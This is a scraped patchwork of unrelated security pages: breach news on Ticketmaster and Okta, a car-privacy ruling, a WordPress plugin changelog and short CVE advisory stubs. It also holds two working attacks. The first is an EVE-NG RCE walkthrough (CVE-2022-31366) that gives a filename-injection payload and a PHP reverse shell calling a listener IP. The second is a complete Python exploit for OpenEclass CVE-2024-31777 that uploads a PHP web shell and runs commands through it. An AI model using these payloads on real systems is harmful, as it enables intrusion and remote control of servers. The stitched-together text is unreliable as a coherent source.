An arbitrary file upload vulnerability in the apiImportLabs function in api_labs.php of EVE-NG 2.0.3-112 Community allows attackers to execute arbitrary code via a crafted UNL file.

Hi all! A few months ago, during an activity, I tested an exposed EVE-NG instance. Immediately I thought:

**“I am going to find a critical vulnerability in EVE-NG!”**

I started the analysis and, a few days later, I reached my mission: now I’m gonna explain you all of my process, from recon to RCE, in:

> EVE-NG 2.0.3-112 (community)

_Let’s goo!_

**Phase 1: Inspecting Source Code**

From EVE-NG Website I downloaded the 2.0.3-112 Community version OVF. It was locally available at 192.168.1.26.

I started the source code analysis by finding potentially dangerous functions like exec, passthru, include and so on. After typing exec in search bar I found this:

_Results of ‘exec’ string_

Looking at results page, I realized it could have been so funny because there were a lot of exec references which imply input data to check and validate. I decided to investigate more in depth on _api\_labs.php_: it exposes an API to manage labs functions.

_api\_labs.php_

A quick sight to these functions gave me a hint on which ones I should focus on:

*   Import Lab
*   Export Lab

_Other ones were more sanitized/hard to exploit or they weren’t “highly related” to a potential RCE._

Function

Possible Exploit

Motivation (lines)

apiCloneLab

Path Traversal

_api\_labs.php_: 107, 117

apiDeleteLab

**RCE**

Possible RCE but hard to exploit (input filters)

apiImportLabs

**RCE**

Possible chained RCE

apiExportLabs

**RCE**

Possible chained RCE

**Phase 2: Exploit Theory**

A deeper inspection led me to this plan:

1.  Import zipped LAB with a payload inside filename
2.  Export the same LAB, thus triggering command execution

> Even if in other API calls UNL filename is checked and verified, in Import LAB feature (ZIP file) there isn’t a check on file parameter:

Function _apiImportLabs_ : html\includes\api_labs.php

_apiImportLabs function_

The absence of this check makes possible to inject arbitrary filenames in UNL files: in Linux almost all characters are permitted inside filename, so it’s fantastic. I only had to end filename with _“.unl”_.

In Export LAB feature there is a check to validate the existence of the file. If the file exists, the filename is passed to exec (parameter we control is $relement):

Function _apiExportLabs_ : html\includes\api_labs.php

_apiExportLabs function_

> **NOTE**: Considering that path delimiters in Linux are forward slashes (/) while I was in Windows environment, I had to inject a payload that didn’t contain such characters (/, : in Windows also \\ is path delimiter). I opted to inject as zip argument a bash command.

**Phase 3: PoC**

1) **Login as Admin**

*   To exploit this vulnerability, we must have enough privileges to create a new Lab. **Admin** user is the only role available in this version, so if you have an account on eve-ng, it will surely be an Administrator.

_Login page_

2) **Import a new LAB**

Once in _/#/main_ you must prepare the payload. Craft a payload as shown in steps below:

*   Create a ZIP file with a simple UNL file
*   Open ZIP file and rename it following these rules:
    *   The filename must end with “.unl”
    *   Filename must not contain these characters: / \\ “ ‘ Considering these limitations and that we must inject bash commands, final payload will be like:

> $(eval $(echo BASE64DATA| base64 --decode)).unl

The best thing we can do in this case is build a reverse shell. Payload is base64 encoded, so we need to base64 encode a reverse shell payload. In my case it has been:

> php -r '$sock=fsockopen("192.168.1.22",5555);exec("/bin/sh -i <&3 >&3 2>&3");'

*   Base64-encoded:

> cGhwIC1yICckc29jaz1mc29ja29wZW4oIjE5Mi4xNjguMS4yMiIsNTU1NSk7ZXhlYygiL2Jpbi9zaCAtaSA8JjMgPiYzIDI+JjMiKTsn

But you must change it in the following format:

> php -r '$sock=fsockopen("YOUR_LISTENING_IP",YOUR_LISTENING_PORT);exec("/bin/sh -i <&3 >&3 2>&3");'

3) **Upload malicious ZIP file as new Lab**

_Malicious ZIP_

4) **Export LAB**

In this final stage you must export the malicious Lab you’ve just created. Shell commands inside the UNL name will be executed. In case of reverse shell, be sure you are listening on IP and port set in malicious filename.

_Netcat listening_

_Export LAB_

_Reverse Shell_

**STAY TUNED!**

CVE-2022-31366: A deep dive into EVE-NG Remote Command Execution

A database has been put up for sale that allegedly contains the data of 560 million Ticketmaster users. But is it real?

Earlier this week, a cybercriminal group posted an alleged database up for sale online which, it says, contains customer and card details of 560 million Live Nation/Ticketmaster users.

The data was offered for sale on one forum under the name “Shiny Hunters”. ShinyHunters is the online handle for a group of notorious cybercriminals associated with numerous data breaches, including the recent AT&T breach.

_Post on BreachForums by ShinyHunters_

The post says:

> “Live Nation / Ticketmaster
> 
> Data includes
> 
> 560 million customer full details (name, address, email, phone)
> 
> Ticket sales, event information, order details
> 
> CC detail – customer last 4 of card, expiration date
> 
> Customer fraud details
> 
> Much more
> 
> Price is $500k USD. One time sale.”

The same data set was offered for sale in an almost identical post on another forum by someone using the handle SpidermanData. This could be the same person or a member of the ShinyHunters group.

According to news outlet ABC, the Australian Department of Home Affairs said it is aware of a cyber incident impacting Ticketmaster customers and is “working with Ticketmaster to understand the incident.”

Some researchers expressed their doubts about the validity of the data set:

> 🚨🚨Thoughts on the alleged Ticketmaster Data Breach 🚨🚨
> 
> TLDR: Alert not Alarmed
> 
> The Ticketmaster data breach claim has provided BreachForums with the quick attention they need to boost their user numbers and reputation.
> 
> The claim has possibly been over-stated to boost… pic.twitter.com/WJsFkBfQbw
> 
> — CyberKnow (@Cyberknow20) May 29, 2024

While others judged it looks legitimate based on conversations with involved individuals, and studying samples of the data set:

> Today we spoke with multiple individuals privy to and involved in the alleged TicketMaster breach.
> 
> Sometime in April an unidentified Threat Group was able to get access to TicketMaster AWS instances by pivoting from a Managed Service Provider. The TicketMaster breach was not…
> 
> — vx-underground (@vxunderground) May 30, 2024

Whether or not the data is real remains to be seen. However, there’s no doubt that scammers will use this opportunity to make a quick profit.

Ticketmaster users will need to be on their guard. Read our tips below for some helpful advice on what to do in the event of a data breach.

You can also check what personal information of yours has already been exposed online with our Digital Footprint portal. Just enter your email address (it’s best to submit the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report.

All parties involved have refrained from any further comments. We’ll keep you posted.

**Protecting yourself from a data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify any contacts using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 The Ticketmaster &#8220;breach&#8221;—what you need to know 

A judge has refused to bring back a class action lawsuit against four car manufacturers because the privacy violation did not meet the WPA standard.

A federal judge has refused to bring back a class action lawsuit that alleged four car manufacturers had violated Washington state’s privacy laws by using vehicles’ on-board infotainment systems to record customers’ text messages and mobile phone call logs.

The judge ruled that the practice doesn’t meet the threshold for an illegal privacy violation under state law. The plaintiffs had appealed a prior judge’s dismissal.

Car manufacturers Honda, Toyota, Volkswagen, and General Motors were facing five related privacy class action suits. One of those cases, against Ford, had been dismissed on appeal previously.

Infotainment systems in the company’s vehicles began downloading and storing a copy of all text messages on smartphones when they were connected to the system. Once messages have been downloaded, the software makes it impossible for vehicle owners to access their communications and call logs but does provide law enforcement with access, the lawsuit said.

The Seattle-based appellate judge ruled that the interception and recording of mobile phone activity did not meet the Washington Privacy Act’s (WPA) standard that a plaintiff must prove that “his or her business, his or her person, or his or her reputation” has been threatened.

In a recent Lock and Code podcast, we heard from Mozilla researchers that the data points that car companies say they can collect on you include social security number, information about your religion, your marital status, genetic information, disability status, immigration status, and race. And they can sell that data to marketers.

This is alarming. Given the increasing number of sensors being placed in cars every year, this is becoming an increasingly grave problem.

In the same podcast, we also explored the booming revenue stream that car manufacturers are tapping into by not only collecting people’s data, but also packaging it together for targeted advertising.

According to the Mozilla research, popular global brands including BMW, Ford, Toyota, Tesla, Kia, and Subaru:

> “Can collect deeply personal data such as sexual activity, immigration status, race, facial expressions, weight, health and genetic information, and where you drive. Researchers found data is being gathered by sensors, microphones, cameras, and the phones and devices drivers connect to their cars, as well as by car apps, company websites, dealerships, and vehicle telematics.”

In fact, the seasoned Mozilla team said “cars are the worst product category we have ever reviewed for privacy” after finding that all 25 car brands they researched earned the “Privacy Not Included” warning label.

Since that doesn’t give us much of a choice to go for a brand that respects our privacy, I suggest we turn of our phones before we start the car. It’s both safer and better for your privacy.

**We don’t just report on threats – we help safeguard your entire digital identity**

Cybersecurity risks should never spread beyond a headline. Protect your and your family’s personal information by using Malwarebytes Identity Theft Protection.

 Judge rules it&#8217;s fine for car makers to intercept your text messages 

The Plus Addons for Elementor Page Builder WordPress plugin before 4.1.11 did not properly check that a user requesting a password reset was the legitimate user, allowing an attacker to send an arbitrary reset password email to a registered user on behalf of the WordPress site. Such issue could be chained with an open redirect (CVE-2021-24358) in version below 4.1.10, to include a crafted password reset link in the email, which would lead to an account takeover.

Compatibility : WordPress 6.0  
Compatibility : Elementor Pro 3.7  
Added : Heading Title : Animated Split by Word

Added : Heading Title : Animated Split by Character

Added : Heading Title : Animated Split by Line

Added : Display Rules : Image Selector(Advanced Custom Fields: Extended)

Added : Display Rules : Visitor Location (IP Based - Based on Geoplugin )

Added : Display Rules : WordPress Site Language

Added : Display Rules : Visitor Browser Language

Added : Display Rules : String in URL (Exact match from URL value )

Added : Display Rules : Parameter in URL 

Added : Display Rules : Shortcode based visibility (Advanced Custom PHP function based Shortcode)

Added : Display Rules : Cart Product Category (WooCommerce)

Added : Display Rules : Category In Cart (WooCommerce)

Added : Display Rules : Cart Subtotal (WooCommerce)

Added : Display Rules : Cart Total (WooCommerce)

Added : Display Rules : Items in Cart (WooCommerce)

Added : Display Rules : Purchase Date (WooCommerce)

Added : Display Rules : In Purchase Product Category (WooCommerce)

Added : Display Rules : Order(s) Placed (WooCommerce)

Added : Display Rules : Current Product Category (WooCommerce)

Added : Display Rules : Current Product Price (WooCommerce)

Added : Display Rules : Current Product Stock (WooCommerce)

Added : Display Rules : Cart Product (WooCommerce)

Added : Display Rules : Text field (Toolset)

Added : Display Rules : Number field (Toolset)

Added : Display Rules : Radio field (Toolset)

Added : Display Rules : Checkbox field (Toolset)

Added : Display Rules : Checkboxes field (Toolset)

Added : Display Rules : Select field (Toolset)

Added : Display Rules : Text field (PODS)

Added : Display Rules : Date field (PODS)

Added : Display Rules : Number field (PODS)

Added : Display Rules : Boolean field (PODS)

Added : Display Rules : Text field (Jet Engine)

Added : Display Rules : Text Area field (Jet Engine)

Added : Display Rules : Switcher field (Jet Engine)

Added : Display Rules : Checkbox field (Jet Engine)

Added : Display Rules : Radio field (Jet Engine)

Added : Display Rules : Select field (Jet Engine)

Added : Display Rules : Number field (Jet Engine)

Added : Mouse Cursor : Container

Added : Unfold : Container

Added : Post Feature Image : Container

Update : Display Rules : Display Field Name with Group Label

Update : Dynamic Listing : Category Listout improvement

Update : Product Listing : Upsell Listing

Update : Product Listing : Cross-Sell Listing

Update : Accordion : Title Empty condition for Dynamic Value

Update : Accordion : Scroll Top Offset

Update : Tabs & Tours : Title Empty condition for Dynamic Value

Update : Scroll Navigation : Section Top Offset after click

Update : Post Meta : Taxonomies Type option (Category/Tag)

Update : Woo Single Basic : Next/Previous related to current Product Category

Update : Search bar : Search by Word Match

Update : Search bar : Related Search Tag

Update : Search Filter : Category show based on Archive page option

Update : Search Filter : Sorting value option for Tab, Radio, Checkbox and Dropdown

Update : Hotspot : Hover Pin Image with flip effect

Update : Audio Player : Loop Disable option

Update : LottieFiles Animation : JSON File Upload

Update : Dynamic Listing : Slide Animation option

Update : Infobox : Slide Animation option

Update : Gallery Listing : Slide Animation option

Update : Search bar : Animation option

Update : Number Counter : Dynamic Tag option for Number Value, Animation Starting Value and Gap

Update : Navigation Menu : Sticky support Container

Update : Navigation Menu : Accessibility

Update : Animated Service Boxes : Lottie Animations option

Update : Hotspot : Lottie Animations option

Update : Image Cascading : Lottie Animations option

Update : Number Counter : Lottie Animations option

Update : Popup Builder : Lottie Animations option

Update : Pricing List : Lottie Animations option

Update : Pricing Table : Lottie Animations option

Update : Process/Steps : Lottie Animations option

Update : Progress Bar : Lottie Animations option

Update : Unfold : Lottie Animations option

Update : Live Copy : Container Compatibility

Update : Plus Extras : Container Compatibility

Update : Display Rules : Container Compatibility

Update : Page Scroll : Container Compatibility

Update : Row Background : Container Compatibility

Update : Shape Divider : Container Compatibility

Update : Morphing Layouts : Container Compatibility

Update : Dynamic Smart Showcase : Container Compatibility

Update : Global Tilt Effect : Container Compatibility

Update : Carousel Slider : Container Compatibility

Update : Advanced Shadow : Container Compatibility

Update : Equal Height : Container Compatibility

Update : Glass Morphism : Container Compatibility

Update : Wrapper Link : Container Compatibility

Update : Animated Service Box : Container Compatibility

Update : Animated Service box Text (Stroke and Shadow)

Update : Animated Service box Height (EM,%,VH)

Update : Countdown : Label HTML Tag option (h1 - h6)

Update : Coupon Code : Title HTML Tag option (h1 - h6)

Update : Coupon Code : Content HTML Tag option (h1 - h6)

Update : Coupon Code : JS improvement for Copy button

Update : Woo MyAccount : No order Found Styling

Update : Woo MyAccount : Order tab Individual improvement

Update : Process Step : Margin option for Description

Update : Listing Widget : Post Excerpt empty value validation

Update : Infobox : Top margin option

Update : Social Feed : Instagram Business Account condition improvement

Update : Dynamic Listing : Author Prefix text dynamic

Update : Blog Listing : Author Prefix text dynamic

Fix : Google Map : HTML display bug with Filter

Fix : Table : Tooltip Field

Fix : Listing Widget : On Load more / Lazy load animation

Fix : Mouse Cursor : Column Cursor icon

Fix : LottieFiles Animation : Animation Play Speed

Fix : Countdown : Fake Number

Fix : Sticky Column

Fix : Design Tool : Background Visibility

Fix : Navigation Menu : CSS based effect bug on click

Fix : Slick Carousel : Draggable Disable bug on Mobile

CVE-2021-24359: Give feedback and suggest new ideas for The Plus Addons for Elementor. Powered by FeedBear.

GUnet OpenEclass E-learning platform version 3.15 suffers from an unrestricted file upload vulnerability in certbadge.php that allows for remote command execution.

    import requestsimport argparseimport zipfileimport osimport sysRED = '\033[91m'GREEN = '\033[92m'YELLOW = '\033[93m'RESET = '\033[0m'ORANGE = '\033[38;5;208m'MALICIOUS_PAYLOAD = """\<?phpif(isset($_REQUEST['cmd'])){        $cmd = ($_REQUEST['cmd']);        system($cmd);        die;}?>"""def banner():    print(f'''{RED}{YELLOW} ============================ Author: Frey ============================{RESET}''')def execute_command(openeclass, filename):    while True:        # Prompt for user input with "eclass"        cmd = input(f"{RED}[{YELLOW}eClass{RED}]~# {RESET}")        # Check if the command is 'quit', then break the loop        if cmd.lower() == "quit":            print(f"{ORANGE}\nExiting...{RESET}")            clean_server(openeclass)            sys.exit()        # Construct the URL with the user-provided command        url = f"{openeclass}/courses/user_progress_data/cert_templates/{filename}?cmd={cmd}"        # Execute the GET request        try:            response = requests.get(url)            # Check if the request was successful            if response.status_code == 200:                # Print the response text                print(f"{GREEN}{response.text}{RESET}")        except requests.exceptions.RequestException as e:            # Print any error that occurs during the request            print(f"{RED}An error occurred: {e}{RESET}")def upload_web_shell(openeclass, username, password):    login_url = f'{openeclass}/?login_page=1'    login_page_url = f'{openeclass}/main/login_form.php?next=%2Fmain%2Fportfolio.php'    # Login credentials    payload = {        'next': '/main/portfolio.php',        'uname': f'{username}',        'pass': f'{password}',        'submit': 'Enter'    }    headers = {        'Referer': login_page_url,    }    # Use a session to ensure cookies are handled correctly    with requests.Session() as session:        # (Optional) Initially visit the login page if needed to get a fresh session cookie or any other required tokens        session.get(login_page_url)        # Post the login credentials        response = session.post(login_url, headers=headers, data=payload)        # Create a zip file containing the malicious payload        zip_file_path = 'malicious_payload.zip'        with zipfile.ZipFile(zip_file_path, 'w') as zipf:            zipf.writestr('evil.php', MALICIOUS_PAYLOAD.encode())        # Upload the zip file        url = f'{openeclass}/modules/admin/certbadge.php?action=add_cert'        files = {            'filename': ('evil.zip', open(zip_file_path, 'rb'), 'application/zip'),            'certhtmlfile': (None, ''),            'orientation': (None, 'L'),            'description': (None, ''),            'cert_id': (None, ''),            'submit_cert_template': (None, '')        }        response = session.post(url, files=files)        # Clean up the zip file        os.remove(zip_file_path)        # Check if the upload was successful        if response.status_code == 200:            print(f"{GREEN}Payload uploaded successfully!{RESET}")            return True        else:            print(f"{RED}Failed to upload payload. Exiting...{RESET}")            return Falsedef clean_server(openeclass):    print(f"{ORANGE}Cleaning server...{RESET}")    # Remove the uploaded files    requests.get(f"{openeclass}/courses/user_progress_data/cert_templates/evil.php?cmd=rm%20evil.zip")    requests.get(f"{openeclass}/courses/user_progress_data/cert_templates/evil.php?cmd=rm%20evil.php")    print(f"{GREEN}Server cleaned successfully!{RESET}")def main():    parser = argparse.ArgumentParser(description="Open eClass – CVE-CVE-2024-31777: Unrestricted File Upload Leads to Remote Code Execution")    parser.add_argument('-u', '--username', required=True, help="Username for login")    parser.add_argument('-p', '--password', required=True, help="Password for login")    parser.add_argument('-e', '--eclass', required=True, help="Base URL of the Open eClass")    args = parser.parse_args()    banner()    # Running the main login and execute command function    if upload_web_shell(args.eclass, args.username, args.password):        execute_command(args.eclass, 'evil.php')if __name__ == "__main__":    main()

GUnet OpenEclass E-learning 3.15 File Upload / Command Execution

A recent breach of authentication giant Okta has impacted nearly 200 of its clients. But repeated incidents and the company’s delayed disclosure have security experts calling foul.

On Friday, October 20, the identity management platform Okta said it suffered an intrusion in its customer support system. As an access and authentication service, a breach of Okta always comes with risks to other organizations, and the company confirmed that “certain Okta customers” were affected. Okta tells WIRED that it notified “around 1 percent” of its 18,400 customers that they were impacted.

The password manager 1Password, an Okta customer, said this week that it had notified the company on September 29 of suspicious activity that ultimately was tied to the support system incident. BeyondTrust, another identity and access management firm and also an Okta customer, said last week that it had similarly flagged concerning behavior in its Okta administrator account and notified the company about the issue on October 2. Internet infrastructure company Cloudflare also said last week that it had detected a similar incident in its Okta systems on October 18 and notified the company as well.

Companies like Okta that provide crucial digital services to a large population of prominent customers are always going to be prime targets for attacks because they can serve as a sort of one-stop shop for hackers looking to compromise numerous organizations. And as tech giants like Microsoft have shown, some of these attacks may well lead to breaches even if the vast majority are blocked. The breach at Okta is particularly concerning because it shares many features with a security incident the company dealt with in 2022, in which attackers compromised a subprocessor that Okta had trusted to do customer support work.

“What I find surprising in this case is that, after the 2022 breach, you'd think Okta would be on high alert for any externally exposed systems or personnel who may be targeted—and yet something has happened again,” says Adam Chester, a senior security consultant at TrustedSec.

The latest incident directly affected Okta's internal customer support service rather than one provided by a third-party partner. In this case, attackers used stolen login credentials to compromise an Okta support account, and then leveraged this access to steal cookies and session tokens used to give customer support providers access to clients' systems for troubleshooting. With these access tokens, attackers could then compromise Okta customer accounts directly.

1Password, BeyondTrust, and Cloudflare all said that they were able to detect and block the intrusions before any of their own customers were affected, but they all highlighted the fact that they had notified Okta about the situation before Okta warned them—in some cases weeks before Okta's public disclosure.

“This is the second time Cloudflare has been impacted by a breach of Okta’s systems,” a group of Cloudflare engineers wrote on Friday. They went on to share a list of recommendations for how Okta can improve its security posture: “Take any report of compromise seriously and act immediately to limit damage. Provide timely, responsible disclosures to your customers when you identify that a breach of your systems has affected them. Require hardware keys to protect all systems, including third-party support providers.”

The Cloudflare engineers added that they view taking protective steps like these as “table stakes” for a company like Okta that provides such crucial security services to so many organizations.

When WIRED asked Okta a series of questions about what steps it is taking to improve customer service defenses in the wake of the two breaches, and why there appears to be a lack of urgency when the company receives reports of potential incidents, the company declined to comment. A spokesperson said it would share more information about these subjects soon.

“I really want to know what technical controls Okta had implemented following the 2022 breach, and why this time will be different,” says Evan Johnson, cofounder of RunReveal, which develops a system visibility and incident detection tool. “My hunch is they did not roll out hardware security keys, or didn’t roll them out for their contractors doing support.”

Jake Williams, a former US National Security Agency hacker and current faculty member at the Institute for Applied Network Security, emphasizes that “the issue is bigger than Okta,” noting that software supply chain attacks and the volume of hacks companies must defend against is significant. “It's unfortunately common for service providers of any size to have trouble believing they are the source of an incident until definitive proof is offered,” he says.

Still, Williams adds, “there's a pattern here with Okta, and it involves outsourced support.” He also notes that one of the remediations Okta suggested to customers in the wake of the recent incident—carefully removing support session tokens that could be compromised from troubleshooting data—is not realistic.

“Okta's suggestion—that somehow the customer must be responsible for stripping session tokens from the files they specifically request for troubleshooting purposes—is absurd,” he says. “That's like handing a knife to a toddler and then blaming the toddler for bleeding.”

Okta's Latest Security Breach Is Haunted by the Ghost of Incidents Past

TestComplete support Plugin 2.8.1 and earlier does not escape the TestComplete project name in its test result page.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.

As of publication of this advisory, there is no fix.

**TestComplete support Plugin vulnerable to stored Cross-site Scripting**

High severity GitHub Reviewed Published May 16, 2023 to the GitHub Advisory Database • Updated May 17, 2023

GHSA-5wpg-qcmj-48wh: TestComplete support Plugin vulnerable to stored Cross-site Scripting

Support Board version 3.3.4 suffers from a persistent cross site scripting vulnerability.

Support Board 3.3.4 Cross Site Scripting

pdf2xml v2.0 was discovered to contain a heap-buffer overflow in the function TextPage::addAttributsNode.

CVE-2020-23874: Poc/pdf2xml at master · Aurorainfinity/Poc

An issue was discovered in Thunar before 4.16.7 and 4.17.x before 4.17.2. When called with a regular file as a command-line argument, it delegates to a different program (based on the file type) without user confirmation. This could be used to achieve code execution.

Search

lenovo warranty check/lookup | check warranty status | lenovo support us